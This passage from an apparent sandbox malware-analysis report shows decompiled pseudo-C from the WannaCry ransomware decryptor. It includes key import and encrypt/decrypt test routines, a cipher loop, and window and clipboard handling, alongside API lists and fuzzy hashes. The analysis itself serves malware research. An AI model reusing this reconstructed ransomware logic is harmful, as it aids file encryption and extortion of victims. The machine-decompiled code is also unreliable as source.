                                                      												 *((intOrPtr*)(_t182 + 0x134)) =  *((intOrPtr*)(_t356 + 0x2a0));
                                                      												__eflags = 0;
                                                      												return 0;
                                                      												goto L73;
                                                      											}
                                                      										} else {
                                                      											_push(_t313);
                                                      											L00412C98();
                                                      											return 0x800;
                                                      										}
                                                      									} else {
                                                      										return 0x800;
                                                      									}
                                                      								} else {
                                                      									return 0x700;
                                                      								}
                                                      							} else {
                                                      								goto L8;
                                                      							}
                                                      						} else {
                                                      							if(_t312 == _t232) {
                                                      								L8:
                                                      								_t226 =  *((intOrPtr*)(_t348 + 0x28c));
                                                      								 *_t226 =  *((intOrPtr*)( *_t336 + 4));
                                                      								 *((char*)(_t226 + 4)) = 0;
                                                      								 *((intOrPtr*)(_t226 + 0x108)) = 0;
                                                      								 *((intOrPtr*)(_t226 + 0x10c)) = 0;
                                                      								 *((intOrPtr*)(_t226 + 0x110)) = 0;
                                                      								 *((intOrPtr*)(_t226 + 0x114)) = 0;
                                                      								 *((intOrPtr*)(_t226 + 0x118)) = 0;
                                                      								 *((intOrPtr*)(_t226 + 0x11c)) = 0;
                                                      								 *((intOrPtr*)(_t226 + 0x120)) = 0;
                                                      								 *((intOrPtr*)(_t226 + 0x124)) = 0;
                                                      								 *((intOrPtr*)(_t226 + 0x128)) = 0;
                                                      								__eflags = 0;
                                                      								return 0;
                                                      							} else {
                                                      								return memcpy( *(_t348 + 0x298), _t336 + 8, 0x4b << 2);
                                                      							}
                                                      						}
                                                      					}
                                                      				}
                                                      				L73:
                                                      			}
                                                      0x00411d80
                                                      0x00411d86
                                                      0x00411d8c
                                                      0x00411d92
                                                      0x00411d98
                                                      0x00411d9e
                                                      0x00411da4
                                                      0x00411daa
                                                      0x00411db2
                                                      0x00411d3b
                                                      0x00411d57
                                                      0x00411d57
                                                      0x00411d39
                                                      0x00411d35
                                                      0x00411d16
                                                      0x00000000

                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000025.00000002.7374567660.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                                      • Associated: 00000025.00000002.7374496167.0000000000400000.00000002.00000001.01000000.00000009.sdmp
                                                      • Associated: 00000025.00000002.7374876187.0000000000415000.00000002.00000001.01000000.00000009.sdmp
                                                      • Associated: 00000025.00000002.7375046059.000000000041F000.00000008.00000001.01000000.00000009.sdmp
                                                      • Associated: 00000025.00000002.7375131130.0000000000421000.00000004.00000001.01000000.00000009.sdmp
                                                      • Associated: 00000025.00000002.7375238880.0000000000423000.00000002.00000001.01000000.00000009.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_37_2_400000_@WanaDecryptor@.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID:
                                                      • String ID: /../$/..\$\../$\..\
                                                      • API String ID: 0-3885502717
                                                      • Opcode ID: 640072b25ce39f29e2e0ef118f9821fd9eceea7f93f8cfb82637dd0406826ea6
                                                      • Instruction ID: 7e1d0207c54717434a39a3e8c1400c014a600b9e0d7efc558eb6bad2cf7342ef
                                                      • Opcode Fuzzy Hash: 640072b25ce39f29e2e0ef118f9821fd9eceea7f93f8cfb82637dd0406826ea6
                                                      • Instruction Fuzzy Hash: FAF138756043414FC724CF2888817EBBBE1ABD8304F18892EEDD9CB351D679E989C799
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      C-Code - Quality: 72%
                                                      			E004067F0(void* __ecx) {
                                                      				signed int _v84;
                                                      				void* _v88;
                                                      				intOrPtr _v92;
                                                      				intOrPtr _v96;
                                                      				intOrPtr _v100;
                                                      				char _v104;
                                                      				int _t16;
                                                      				int _t21;
                                                      				int _t22;
                                                      				int _t37;
                                                      				struct tagRECT* _t48;
                                                      				void* _t56;
                                                      
                                                      				_t56 = __ecx;
                                                      				_t16 = IsIconic( *(__ecx + 0x20));
                                                      				if(_t16 == 0) {
                                                      					L00412CBC();
                                                      					return _t16;
                                                      				} else {
                                                      					_push(_t56);
                                                      					L00412DD0();
                                                      					asm("sbb eax, eax");
                                                      					SendMessageA( *(_t56 + 0x20), 0x27,  ~( &_v88) & _v84, 0);
                                                      					_t21 = GetSystemMetrics(0xb);
                                                      					_t22 = GetSystemMetrics(0xc);
                                                      					_t48 =  &_v104;
                                                      					GetClientRect( *(_t56 + 0x20), _t48);
                                                      					asm("cdq");
                                                      					asm("cdq");
                                                      					_t37 = DrawIcon(_v84, _v96 - _v104 - _t21 + 1 - _v104 >> 1, _v92 - _v100 - _t22 + 1 - _t48 >> 1,  *(_t56 + 0x82c));
                                                      					L00412DB8();
                                                      					return _t37;
                                                      				}
                                                      			}


                                                      APIs
                                                      Memory Dump Source
                                                      • Source File: 00000025.00000002.7374567660.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                                      • Associated: 00000025.00000002.7374496167.0000000000400000.00000002.00000001.01000000.00000009.sdmp
                                                      • Associated: 00000025.00000002.7374876187.0000000000415000.00000002.00000001.01000000.00000009.sdmp
                                                      • Associated: 00000025.00000002.7375046059.000000000041F000.00000008.00000001.01000000.00000009.sdmp
                                                      • Associated: 00000025.00000002.7375131130.0000000000421000.00000004.00000001.01000000.00000009.sdmp
                                                      • Associated: 00000025.00000002.7375238880.0000000000423000.00000002.00000001.01000000.00000009.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_37_2_400000_@WanaDecryptor@.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: MetricsSystem$#2379#470#755ClientDrawIconIconicMessageRectSend
                                                      • String ID:
                                                      • API String ID: 1397574227-0
                                                      • Opcode ID: c6b99cd5ac0b71c3c4030717ac5958d372fb1afb6ef73d6220d96d7f8d3b0266
                                                      • Instruction ID: db6533e43e067d2e1cb08ff7c7a85c8aaf9a8b82d3d45c58550572c7a5875683
                                                      • Opcode Fuzzy Hash: c6b99cd5ac0b71c3c4030717ac5958d372fb1afb6ef73d6220d96d7f8d3b0266
                                                      • Instruction Fuzzy Hash: 45117F712146069FC214DF38DD49DEBB7E9FBC8304F488A2DF58AC3290DA74E8058B95
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      C-Code - Quality: 65%
                                                      			E0040B3C0(void* __ebx, void* __ecx, void* __ebp, void* _a4, signed int _a8, signed int _a12, void* _a16) {
                                                      				void* _v4;
                                                      				void* _v12;
                                                      				char _v16;
                                                      				void* _v20;
                                                      				char _v24;
                                                      				struct HWND__* _v32;
                                                      				WCHAR* _v36;
                                                      				struct HWND__* _t90;
                                                      				signed int* _t100;
                                                      				signed int _t102;
                                                      				signed int _t105;
                                                      				signed int* _t109;
                                                      				signed int _t113;
                                                      				signed int _t114;
                                                      				signed int _t121;
                                                      				void* _t124;
                                                      				signed int _t130;
                                                      				signed int _t132;
                                                      				signed int _t138;
                                                      				signed int _t143;
                                                      				signed int _t152;
                                                      				signed int _t157;
                                                      				void* _t185;
                                                      				void* _t188;
                                                      				signed int* _t191;
                                                      				void* _t204;
                                                      				signed int _t206;
                                                      				struct HWND__* _t207;
                                                      				void* _t211;
                                                      				void* _t212;
                                                      				void* _t217;
                                                      				void* _t218;
                                                      				signed int _t221;
                                                      				void* _t224;
                                                      				signed int* _t226;
                                                      				void* _t227;
                                                      				void* _t228;
                                                      
                                                      				_t228 = _t227 - 0xc;
                                                      				_t124 = __ecx;
                                                      				if( *((intOrPtr*)(__ecx + 4)) == 0) {
                                                      					__imp__??0exception@@QAE@ABQBD@Z(0x4213a8);
                                                      					_push(0x41c9c0);
                                                      					_push( &_v16);
                                                      					L004130FC();
                                                      				}
                                                      				_t206 = _a12;
                                                      				_t185 = 0;
                                                      				if(_t206 == 0) {
                                                      					L26:
                                                      					__imp__??0exception@@QAE@ABQBD@Z(0x4213ac);
                                                      					_push(0x41c9c0);
                                                      					_push( &_v16);
                                                      					L004130FC();
                                                      					_push(_t206);
                                                      					_t90 = FindWindowW(0, _v36); // executed
                                                      					_t207 = _t90;
                                                      					if(_t207 != 0) {
                                                      						_push(_t185);
                                                      						ShowWindow(_t207, 5); // executed
                                                      						SetWindowPos(_t207, 0xffffffff, 0, 0, 0, 0, 0x43);
                                                      						SetWindowPos(_t207, 0xfffffffe, 0, 0, 0, 0, 0x43);
                                                      						SetForegroundWindow(_t207); // executed
                                                      						SetFocus(_t207);
                                                      						SetActiveWindow(_t207);
                                                      						BringWindowToTop(_t207);
                                                      						_t90 = _v32;
                                                      						if(_t90 != 0) {
                                                      							ExitProcess(0);
                                                      						}
                                                      					}
                                                      					return _t90;
                                                      				} else {
                                                      					_t130 =  *(_t124 + 0x3cc);
                                                      					if(_t206 % _t130 != 0) {
                                                      						goto L26;
                                                      					} else {
                                                      						_t100 = _a16;
                                                      						if(_t100 != 1) {
                                                      							L13:
                                                      							_a16 = _t185;
                                                      							if(_t100 != 2) {
                                                      								L23:
                                                      								_t102 = _t206 / _t130;
                                                      								_t188 = _a4;
                                                      								_t221 = _a8;
                                                      								if(_t102 <= 0) {
                                                      									goto L11;
                                                      								} else {
                                                      									do {
                                                      										_push(_t221);
                                                      										_push(_t188);
                                                      										E0040B0C0(_t124);
                                                      										_t132 =  *(_t124 + 0x3cc);
                                                      										_t188 = _t188 + _t132;
                                                      										_t221 = _t221 + _t132;
                                                      										_a8 = _a8 + 1;
                                                      										_t105 = _t206 / _t132;
                                                      									} while (_a8 < _t105);
                                                      									return _t105;
                                                      								}
                                                      							} else {
                                                      								_t102 = _t206 / _t130;
                                                      								_t191 = _a8;
                                                      								_t224 = _a4;
                                                      								_a4 = _t191;
                                                      								if(_t102 <= 0) {
                                                      									goto L11;
                                                      								} else {
                                                      									while(1) {
                                                      										_t50 = _t124 + 0x3f0; // 0x444
                                                      										_push(_t191);
                                                      										E0040ADC0(_t124);
                                                      										_t109 = _t191;
                                                      										if( *((intOrPtr*)(_t124 + 4)) == 0) {
                                                      											break;
                                                      										}
                                                      										_t211 = 0;
                                                      										if( *(_t124 + 0x3cc) > 0) {
                                                      											do {
                                                      												 *_t109 =  *_t109 ^  *(_t211 + _t224);
                                                      												_t109 =  &(_t109[0]);
                                                      												_t211 = _t211 + 1;
                                                      											} while (_t211 <  *(_t124 + 0x3cc));
                                                      										}
                                                      										_t212 = _t224;
                                                      										_t56 = _t124 + 0x3f0; // 0x444
                                                      										_t138 =  *(_t124 + 0x3cc) >> 2;
                                                      										_t113 = memcpy(_t212 + _t138 + _t138, _t212, memcpy(_t56, _t212, _t138 << 2) & 0x00000003);
                                                      										_t228 = _t228 + 0x18;
                                                      										_t143 =  *(_t124 + 0x3cc);
                                                      										_t114 = _t113 / _t143;
                                                      										_t224 = _t224 + _t143;
                                                      										_v4 = _v4 + _t143;
                                                      										_t206 = _a8 + 1;
                                                      										_a8 = _t206;
                                                      										if(_t206 < _t114) {
                                                      											_t191 = _v4;
                                                      											continue;
                                                      										} else {
                                                      											return _t114;
                                                      										}
                                                      										goto L31;
                                                      									}
                                                      									__imp__??0exception@@QAE@ABQBD@Z(0x4213a8);
                                                      									_t130 =  &_v24;
                                                      									_push(0x41c9c0);
                                                      									_push(_t130);
                                                      									L004130FC();
                                                      									goto L23;
                                                      								}
                                                      							}
                                                      						} else {
                                                      							_t102 = _t206 / _t130;
                                                      							_t226 = _a8;
                                                      							_a16 = 0;
                                                      							if(_t102 <= 0) {
                                                      								L11:
                                                      								return _t102;
                                                      							} else {
                                                      								while(1) {
                                                      									_push(_t226);
                                                      									_push(_a4);
                                                      									E0040B0C0(_t124);
                                                      									_t100 = _t226;
                                                      									if( *((intOrPtr*)(_t124 + 4)) == 0) {
                                                      										break;
                                                      									}
                                                      									_t217 = 0;
                                                      									if( *(_t124 + 0x3cc) > 0) {
                                                      										_t22 = _t124 - _t226 + 0x3f0; // 0x444
                                                      										_t204 = _t22;
                                                      										do {
                                                      											 *_t100 =  *_t100 ^  *(_t204 + _t100);
                                                      											_t100 =  &(_t100[0]);
                                                      											_t217 = _t217 + 1;
                                                      										} while (_t217 <  *(_t124 + 0x3cc));
                                                      									}
                                                      									_t218 = _v4;
                                                      									_t27 = _t124 + 0x3f0; // 0x444
                                                      									_t152 =  *(_t124 + 0x3cc) >> 2;
                                                      									_t121 = memcpy(_t218 + _t152 + _t152, _t218, memcpy(_t27, _t218, _t152 << 2) & 0x00000003);
                                                      									_t228 = _t228 + 0x18;
                                                      									_t157 =  *(_t124 + 0x3cc);
                                                      									_t102 = _t121 / _t157;
                                                      									_t185 = _v4 + _t157;
                                                      									_t226 = _t226 + _t157;
                                                      									_t206 = _a8 + 1;
                                                      									_v4 = _t185;
                                                      									_a8 = _t206;
                                                      									if(_t206 < _t102) {
                                                      										continue;
                                                      									} else {
                                                      										goto L11;
                                                      									}
                                                      									goto L31;
                                                      								}
                                                      								__imp__??0exception@@QAE@ABQBD@Z(0x4213a8);
                                                      								_t130 =  &_v24;
                                                      								_push(0x41c9c0);
                                                      								_push(_t130);
                                                      								L004130FC();
                                                      								goto L13;
                                                      							}
                                                      						}
                                                      					}
                                                      				}
                                                      				L31:
                                                      			}

                                                      0x0040b53a
                                                      0x0040b541
                                                      0x0040b549
                                                      0x0040b54a
                                                      0x0040b54b
                                                      0x0040b53a
                                                      0x0040b555
                                                      0x0040b559
                                                      0x0040b55f
                                                      0x0040b56f
                                                      0x0040b56f
                                                      0x0040b571
                                                      0x0040b57b
                                                      0x0040b57f
                                                      0x0040b581
                                                      0x0040b589
                                                      0x0040b58a
                                                      0x0040b590
                                                      0x0040b512
                                                      0x00000000
                                                      0x0040b592
                                                      0x0040b599
                                                      0x0040b599
                                                      0x00000000
                                                      0x0040b590
                                                      0x0040b5a5
                                                      0x0040b5ab
                                                      0x0040b5af
                                                      0x0040b5b4
                                                      0x0040b5b5
                                                      0x00000000
                                                      0x0040b5b5
                                                      0x0040b50e
                                                      0x0040b41d
                                                      0x0040b429
                                                      0x0040b42b
                                                      0x0040b42f
                                                      0x0040b435
                                                      0x0040b4c5
                                                      0x0040b4cc
                                                      0x0040b43b
                                                      0x0040b43b
                                                      0x0040b43f
                                                      0x0040b440
                                                      0x0040b443
                                                      0x0040b44b
                                                      0x0040b44f
                                                      0x00000000
                                                      0x00000000
                                                      0x0040b457
                                                      0x0040b45b
                                                      0x0040b461
                                                      0x0040b461
                                                      0x0040b467
                                                      0x0040b46e
                                                      0x0040b476
                                                      0x0040b477
                                                      0x0040b478
                                                      0x0040b467
                                                      0x0040b482
                                                      0x0040b488
                                                      0x0040b48e
                                                      0x0040b49e
                                                      0x0040b49e
                                                      0x0040b4a0
                                                      0x0040b4aa
                                                      0x0040b4b0
                                                      0x0040b4b2
                                                      0x0040b4b4
                                                      0x0040b4b5
                                                      0x0040b4b9
                                                      0x0040b4bf
                                                      0x00000000
                                                      0x00000000
                                                      0x00000000
                                                      0x00000000
                                                      0x00000000
                                                      0x0040b4bf
                                                      0x0040b4d8
                                                      0x0040b4de
                                                      0x0040b4e2
                                                      0x0040b4e7
                                                      0x0040b4e8
                                                      0x00000000
                                                      0x0040b4e8
                                                      0x0040b435
                                                      0x0040b417
                                                      0x0040b40a
                                                      0x00000000

                                                      APIs
                                                      • ??0exception@@QAE@ABQBD@Z.MSVCRT(004213A8), ref: 0040B3D9
                                                      • _CxxThrowException.MSVCRT(?,0041C9C0), ref: 0040B3E9
                                                      • ??0exception@@QAE@ABQBD@Z.MSVCRT(004213A8), ref: 0040B4D8
                                                      • _CxxThrowException.MSVCRT(?,0041C9C0), ref: 0040B4E8
                                                      • ??0exception@@QAE@ABQBD@Z.MSVCRT(004213A8), ref: 0040B5A5
                                                      • _CxxThrowException.MSVCRT(?,0041C9C0), ref: 0040B5B5
                                                      • ??0exception@@QAE@ABQBD@Z.MSVCRT(004213AC), ref: 0040B60B
                                                      • _CxxThrowException.MSVCRT(?,0041C9C0), ref: 0040B61B
                                                      Memory Dump Source
                                                      • Source File: 00000025.00000002.7374567660.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                                      • Associated: 00000025.00000002.7374496167.0000000000400000.00000002.00000001.01000000.00000009.sdmp
                                                      • Associated: 00000025.00000002.7374876187.0000000000415000.00000002.00000001.01000000.00000009.sdmp
                                                      • Associated: 00000025.00000002.7375046059.000000000041F000.00000008.00000001.01000000.00000009.sdmp
                                                      • Associated: 00000025.00000002.7375131130.0000000000421000.00000004.00000001.01000000.00000009.sdmp
                                                      • Associated: 00000025.00000002.7375238880.0000000000423000.00000002.00000001.01000000.00000009.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_37_2_400000_@WanaDecryptor@.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: ??0exception@@ExceptionThrow
                                                      • String ID:
                                                      • API String ID: 941485209-0
                                                      • Opcode ID: 2930f8dc85a5339e3a1fcc916d8be05eb344af61b78126309babfa6b5c92ee79
                                                      • Instruction ID: 0dbcc5357461fba905cfbac0272349747bc27b8ce320a87ccfe5983878451c5e
                                                      • Opcode Fuzzy Hash: 2930f8dc85a5339e3a1fcc916d8be05eb344af61b78126309babfa6b5c92ee79
                                                      • Instruction Fuzzy Hash: 7A61D5316043158BC705DE2998919ABB7E6FFC8704F04497EFC89BB345C738AA06CB99
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      C-Code - Quality: 100%
                                                      			E00407C30(void* __ecx) {
                                                      				int _t9;
                                                      				void* _t15;
                                                      				void* _t22;
                                                      				signed int _t25;
                                                      				signed int _t26;
                                                      				void* _t39;
                                                      				void* _t40;
                                                      
                                                      				_t39 = __ecx;
                                                      				_t9 = OpenClipboard( *(__ecx + 0x20));
                                                      				if(_t9 == 0) {
                                                      					return _t9;
                                                      				} else {
                                                      					_t22 = GlobalAlloc(2,  *((intOrPtr*)( *(_t39 + 0x508) - 8)) + 1);
                                                      					if(_t22 != 0) {
                                                      						EmptyClipboard();
                                                      						_t40 =  *(_t39 + 0x508);
                                                      						_t15 = GlobalLock(_t22);
                                                      						_t25 =  *((intOrPtr*)(_t40 - 8)) + 1;
                                                      						_t26 = _t25 >> 2;
                                                      						memcpy(_t15, _t40, _t26 << 2);
                                                      						memcpy(_t40 + _t26 + _t26, _t40, _t25 & 0x00000003);
                                                      						GlobalUnlock(_t22);
                                                      						SetClipboardData(1, _t22);
                                                      						return CloseClipboard();
                                                      					}
                                                      					return CloseClipboard();
                                                      				}
                                                      			}











                                                      APIs
                                                      • OpenClipboard.USER32(?), ref: 00407C38
                                                      • GlobalAlloc.KERNEL32(00000002,?), ref: 00407C4F
                                                      • CloseClipboard.USER32 ref: 00407C5B
                                                      • EmptyClipboard.USER32 ref: 00407C66
                                                      • GlobalLock.KERNEL32(00000000), ref: 00407C79
                                                      • GlobalUnlock.KERNEL32(00000000), ref: 00407C92
                                                      • SetClipboardData.USER32(00000001,00000000), ref: 00407C9B
                                                      • CloseClipboard.USER32 ref: 00407CA1
                                                      Memory Dump Source
                                                      • Source File: 00000025.00000002.7374567660.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                                      • Associated: 00000025.00000002.7374496167.0000000000400000.00000002.00000001.01000000.00000009.sdmp
                                                      • Associated: 00000025.00000002.7374876187.0000000000415000.00000002.00000001.01000000.00000009.sdmp
                                                      • Associated: 00000025.00000002.7375046059.000000000041F000.00000008.00000001.01000000.00000009.sdmp
                                                      • Associated: 00000025.00000002.7375131130.0000000000421000.00000004.00000001.01000000.00000009.sdmp
                                                      • Associated: 00000025.00000002.7375238880.0000000000423000.00000002.00000001.01000000.00000009.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_37_2_400000_@WanaDecryptor@.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: Clipboard$Global$Close$AllocDataEmptyLockOpenUnlock
                                                      • String ID:
                                                      • API String ID: 142981918-0
                                                      • Opcode ID: 93754508b4dfef54d9d98e8e63777799f1bb11e1cbd450fa109b80c0f9b4831a
                                                      • Instruction ID: 8252ba06fde5d142781bbccc432981ef86be9671d894a3679d09edf034c0945c
                                                      • Opcode Fuzzy Hash: 93754508b4dfef54d9d98e8e63777799f1bb11e1cbd450fa109b80c0f9b4831a
                                                      • Instruction Fuzzy Hash: 1D014B71740A05DFD714ABA5EC8DAFBB7A9FB88356B908079F54AC3350CF61AC048B64
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      C-Code - Quality: 47%
                                                      			E004047C0(intOrPtr __ecx, intOrPtr _a4, signed int _a8) {
                                                      				long* _v8;
                                                      				char _v20;
                                                      				void _v539;
                                                      				char _v540;
                                                      				char _v543;
                                                      				char _v544;
                                                      				intOrPtr _v548;
                                                      				char _v552;
                                                      				int _v556;
                                                      				intOrPtr _v560;
                                                      				void* __ebx;
                                                      				char _t38;
                                                      				void* _t45;
                                                      				void* _t48;
                                                      				intOrPtr _t63;
                                                      				intOrPtr _t67;
                                                      				signed int _t76;
                                                      				unsigned int _t78;
                                                      				signed int _t79;
                                                      				long* _t85;
                                                      				char _t92;
                                                      				void* _t116;
                                                      				intOrPtr _t118;
                                                      				void* _t120;
                                                      				void* _t121;
                                                      
                                                      				_push(0xffffffff);
                                                      				_push(0x415e38);
                                                      				_push(0x413050);
                                                      				_push( *[fs:0x0]);
                                                      				 *[fs:0x0] = _t118;
                                                      				_t63 = __ecx;
                                                      				_v560 = __ecx;
                                                      				_t38 = "TESTDATA"; // 0x54534554
                                                      				_v552 = _t38;
                                                      				_t67 =  *0x420c64; // 0x41544144
                                                      				_v548 = _t67;
                                                      				_t92 =  *0x420c68; // 0x0
                                                      				_v544 = _t92;
                                                      				_v543 = 0;
                                                      				_v540 = 0;
                                                      				memset( &_v539, 0, 0x7f << 2);
                                                      				_t120 = _t118 - 0x21c + 0xc;
                                                      				asm("stosw");
                                                      				asm("stosb");
                                                      				asm("repne scasb");
                                                      				_v556 = 0xbadbac;
                                                      				if(E004046B0(_t63) == 0) {
                                                      					L6:
                                                      					 *[fs:0x0] = _v20;
                                                      					return 0;
                                                      				} else {
                                                      					_v8 = 0;
                                                      					_t45 = E004049B0( *((intOrPtr*)(_t63 + 4)), _t63 + 8, _a4);
                                                      					_t121 = _t120 + 0xc;
                                                      					if(_t45 == 0) {
                                                      						L12:
                                                      						_push(0xffffffff);
                                                      						_push( &_v20);
                                                      						goto L5;
                                                      					} else {
                                                      						_t76 = _a8;
                                                      						_t48 = E004049B0( *((intOrPtr*)(_t63 + 4)), _t63 + 0xc, _t76);
                                                      						_t121 = _t121 + 0xc;
                                                      						if(_t48 == 0) {
                                                      							goto L12;
                                                      						} else {
                                                      							asm("repne scasb");
                                                      							_t78 =  !(_t76 | 0xffffffff);
                                                      							_t116 =  &_v552 - _t78;
                                                      							_t79 = _t78 >> 2;
                                                      							memcpy(_t116 + _t79 + _t79, _t116, memcpy( &_v540, _t116, _t79 << 2) & 0x00000003);
                                                      							_t121 = _t121 + 0x18;
                                                      							_push(0x200);
                                                      							_push( &_v556);
                                                      							_push( &_v540);
                                                      							_push(0);
                                                      							_push(1);
                                                      							_push(0);
                                                      							_push( *((intOrPtr*)(_t63 + 8)));
                                                      							if( *0x4217cc() != 0) {
                                                      								_t85 =  *(_t63 + 0xc);
                                                      								if(CryptDecrypt(_t85, 0, 1, 0,  &_v540,  &_v556) != 0) {
                                                      									asm("repne scasb");
                                                      									if(strncmp( &_v540,  &_v552,  !(_t85 | 0xffffffff) - 1) != 0) {
                                                      										_v8 = 0xffffffff;
                                                      										E004049A6(_t63);
                                                      										goto L6;
                                                      									} else {
                                                      										_push(0xffffffff);
                                                      										_push( &_v20);
                                                      										L00413056();
                                                      										 *[fs:0x0] = _v20;
                                                      										return 1;
                                                      									}
                                                      								} else {
                                                      									_push(0xffffffff);
                                                      									_push( &_v20);
                                                      									goto L5;
                                                      								}
                                                      							} else {
                                                      								_push(0xffffffff);
                                                      								_push( &_v20);
                                                      								L5:
                                                      								L00413056();
                                                      								goto L6;
                                                      							}
                                                      						}
                                                      					}
                                                      				}
                                                      			}





























                                                      APIs
                                                        • Part of subcall function 004046B0: CryptAcquireContextA.ADVAPI32(?,00000000,00000000,00000018,F0000000,?,?,0040484E,00000001,?,0019FA30), ref: 004046CD
                                                        • Part of subcall function 004049B0: CreateFileA.KERNEL32(?,80000000,00000001,00000000,00000003,00000000,00000000), ref: 004049F5
                                                        • Part of subcall function 004049B0: GetFileSize.KERNEL32(00000000,00000000), ref: 00404A0B
                                                        • Part of subcall function 004049B0: _local_unwind2.MSVCRT ref: 00404AC7
                                                      • CryptEncrypt.ADVAPI32(?,00000000,00000001,00000000,00000000,00000001,00000200,?,?,?,00000001,?,0019FA30), ref: 004048DB
                                                      • _local_unwind2.MSVCRT ref: 004048EB
                                                      • CryptDecrypt.ADVAPI32(?,00000000,00000001,00000000,00000000,00000001,?,?,?,00000001,?,0019FA30), ref: 00404920
                                                      • strncmp.MSVCRT(00000000,?,?,?,?,?,00000001,?,0019FA30), ref: 00404951
                                                      • _local_unwind2.MSVCRT ref: 00404964
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000025.00000002.7374567660.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                                      • Associated: 00000025.00000002.7374496167.0000000000400000.00000002.00000001.01000000.00000009.sdmp
                                                      • Associated: 00000025.00000002.7374876187.0000000000415000.00000002.00000001.01000000.00000009.sdmp
                                                      • Associated: 00000025.00000002.7375046059.000000000041F000.00000008.00000001.01000000.00000009.sdmp
                                                      • Associated: 00000025.00000002.7375131130.0000000000421000.00000004.00000001.01000000.00000009.sdmp
                                                      • Associated: 00000025.00000002.7375238880.0000000000423000.00000002.00000001.01000000.00000009.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_37_2_400000_@WanaDecryptor@.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: Crypt_local_unwind2$File$AcquireContextCreateDecryptEncryptSizestrncmp
                                                      • String ID: TESTDATA
                                                      • API String ID: 154225373-1607903762
                                                      • Opcode ID: 9fc8fd852483a7773baa26bdbab2755cf9050b3d98a8213ca234863979ca94e3
                                                      • Instruction ID: 12943b98363484da7d263465f98eb3331ab271d68fc45af0c4cd497e7be75c93
                                                      • Opcode Fuzzy Hash: 9fc8fd852483a7773baa26bdbab2755cf9050b3d98a8213ca234863979ca94e3
                                                      • Instruction Fuzzy Hash: 21512DB6600218ABCB24CB64DC45BEBB7B4FB98320F10477DF915A72C1EB749A44CB94
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      C-Code - Quality: 62%
                                                      			E004049B0(long* _a4, HCRYPTKEY* _a8, CHAR* _a12) {
                                                      				int _v8;
                                                      				char _v20;
                                                      				long _v32;
                                                      				int _v36;
                                                      				long _v40;
                                                      				void* _v44;
                                                      				long _t24;
                                                      				int _t28;
                                                      				BYTE* _t35;
                                                      				void* _t46;
                                                      				long _t51;
                                                      				intOrPtr _t53;
                                                      
                                                      				_push(0xffffffff);
                                                      				_push(0x415e48);
                                                      				_push(0x413050);
                                                      				_push( *[fs:0x0]);
                                                      				 *[fs:0x0] = _t53;
                                                      				_v44 = 0xffffffff;
                                                      				_v32 = 0;
                                                      				_v36 = 0;
                                                      				_v8 = 0;
                                                      				_t46 = CreateFileA(_a12, 0x80000000, 1, 0, 3, 0, 0);
                                                      				_v44 = _t46;
                                                      				if(_t46 == 0xffffffff) {
                                                      					L10:
                                                      					_push(0xffffffff);
                                                      					goto L11;
                                                      				} else {
                                                      					_t24 = GetFileSize(_t46, 0);
                                                      					_t51 = _t24;
                                                      					_v40 = _t51;
                                                      					if(_t51 != 0xffffffff) {
                                                      						if(_t51 <= 0x19000) {
                                                      							_t35 = GlobalAlloc(0, _t51);
                                                      							_v36 = _t35;
                                                      							if(_t35 == 0) {
                                                      								goto L10;
                                                      							} else {
                                                      								if(ReadFile(_t46, _t35, _t51,  &_v32, 0) != 0) {
                                                      									_t28 = CryptImportKey(_a4, _t35, _v32, 0, 0, _a8);
                                                      									_push(0xffffffff);
                                                      									if(_t28 == 0) {
                                                      										L11:
                                                      										_push( &_v20);
                                                      										goto L12;
                                                      									} else {
                                                      										_push( &_v20);
                                                      										L00413056();
                                                      										 *[fs:0x0] = _v20;
                                                      										return 1;
                                                      									}
                                                      								} else {
                                                      									_push(0xffffffff);
                                                      									_push( &_v20);
                                                      									goto L12;
                                                      								}
                                                      							}
                                                      						} else {
                                                      							_push(0xffffffff);
                                                      							_push( &_v20);
                                                      							goto L12;
                                                      						}
                                                      					} else {
                                                      						_push(_t24);
                                                      						_push( &_v20);
                                                      						L12:
                                                      						L00413056();
                                                      						 *[fs:0x0] = _v20;
                                                      						return 0;
                                                      					}
                                                      				}
                                                      			}
















                                                      APIs
                                                      • CreateFileA.KERNEL32(?,80000000,00000001,00000000,00000003,00000000,00000000), ref: 004049F5
                                                      • GetFileSize.KERNEL32(00000000,00000000), ref: 00404A0B
                                                      • _local_unwind2.MSVCRT ref: 00404AC7
                                                      Memory Dump Source
                                                      • Source File: 00000025.00000002.7374567660.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                                      • Associated: 00000025.00000002.7374496167.0000000000400000.00000002.00000001.01000000.00000009.sdmp
                                                      • Associated: 00000025.00000002.7374876187.0000000000415000.00000002.00000001.01000000.00000009.sdmp
                                                      • Associated: 00000025.00000002.7375046059.000000000041F000.00000008.00000001.01000000.00000009.sdmp
                                                      • Associated: 00000025.00000002.7375131130.0000000000421000.00000004.00000001.01000000.00000009.sdmp
                                                      • Associated: 00000025.00000002.7375238880.0000000000423000.00000002.00000001.01000000.00000009.sdmp
                                                      Joe Sandbox IDA Plugin
